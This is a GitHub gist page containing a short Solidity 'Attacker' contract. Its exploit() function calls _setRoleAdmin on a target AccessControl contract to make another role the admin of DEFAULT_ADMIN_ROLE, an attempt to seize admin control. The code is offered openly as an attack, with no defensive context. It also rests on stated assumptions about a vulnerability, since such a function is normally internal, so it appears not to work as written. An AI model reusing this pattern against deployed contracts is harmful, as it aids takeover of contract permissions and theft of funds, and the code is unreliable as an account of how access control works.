Skip to content

Instantly share code, notes, and snippets.

@anytimegaming3
Created March 17, 2024 21:05
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save anytimegaming3/4b6e12d9903dd239d0c85868d350bff6 to your computer and use it in GitHub Desktop.
Save anytimegaming3/4b6e12d9903dd239d0c85868d350bff6 to your computer and use it in GitHub Desktop.
// Assuming AccessControl contract with _setRoleAdmin function vulnerability
contract Attacker {
AccessControl public vulnerableContract;
constructor(address _vulnerableContract) {
vulnerableContract = AccessControl(_vulnerableContract);
}
// Exploit the vulnerability to assign NEW_ADMIN_ROLE as admin for DEFAULT_ADMIN_ROLE
function exploit() external {
bytes32 targetRole = bytes32(uint256(0)); // Assuming DEFAULT_ADMIN_ROLE is the first role defined
bytes32 newAdminRole = bytes32(uint256(1)); // Assuming NEW_ADMIN_ROLE is the next role identifier
vulnerableContract._setRoleAdmin(targetRole, newAdminRole);
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment